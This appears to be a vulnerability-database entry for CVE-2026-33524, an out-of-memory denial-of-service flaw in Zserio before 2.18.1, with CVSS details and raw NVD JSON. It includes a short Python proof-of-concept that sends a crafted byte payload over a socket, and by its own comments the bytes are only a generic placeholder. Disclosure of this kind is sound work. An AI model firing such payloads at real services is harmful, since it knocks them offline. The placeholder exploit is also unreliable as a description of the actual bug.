CVE-2026-33524

Description

Zserio is a framework for serializing structured data with a compact and efficient way with low overhead. Prior to 2.18.1, a crafted payload as small as 4-5 bytes can force memory allocations of up to 16 GB, crashing any process with an OOM error (Denial of Service). This vulnerability is fixed in 2.18.1.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nds-association:zserio:*:*:*:*:*:*:*:* - VULNERABLE

Zserio < 2.18.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# PoC for CVE-2026-33524
# This script sends a crafted payload to trigger OOM in vulnerable Zserio instances.
# Note: The actual bytes depend on the specific Zserio schema being targeted.
# This is a generic representation of the "4-5 bytes" payload mentioned.

TARGET_HOST = "127.0.0.1"
TARGET_PORT = 8080

# Placeholder for the malicious bytes.
# In a real scenario, these bytes would align with a schema field that triggers the allocation bug.
# Example: A length field set to 0xFFFFFFFF interpreted as a signed -1 or huge unsigned int.
crafted_payload = b"\x00\x00\x00\xFF"

def exploit():
    try:
        print(f"[*] Sending payload to {TARGET_HOST}:{TARGET_PORT}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_HOST, TARGET_PORT))
        s.sendall(crafted_payload)
        print("[+] Payload sent. Check if the target process crashed due to OOM.")
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33524
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33524
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33524/
[4] VulDB https://vuldb.com/cve/CVE-2026-33524
[5] https://github.com/ndsev/zserio/security/advisories/GHSA-cwq5-8pvq-j65j

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33524", "sourceIdentifier": "[email protected]", "published": "2026-04-24T19:17:09.850", "lastModified": "2026-04-28T18:33:01.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zserio is a framework for serializing structured data with a compact and efficient way with low overhead. Prior to 2.18.1, a crafted payload as small as 4-5 bytes can force memory allocations of up to 16 GB, crashing any process with an OOM error (Denial of Service). This vulnerability is fixed in 2.18.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nds-association:zserio:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.18.1", "matchCriteriaId": "5488B9D1-04B2-459B-BE23-2FF4A91D12CF"}]}]}], "references": [{"url": "https://github.com/ndsev/zserio/security/advisories/GHSA-cwq5-8pvq-j65j", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}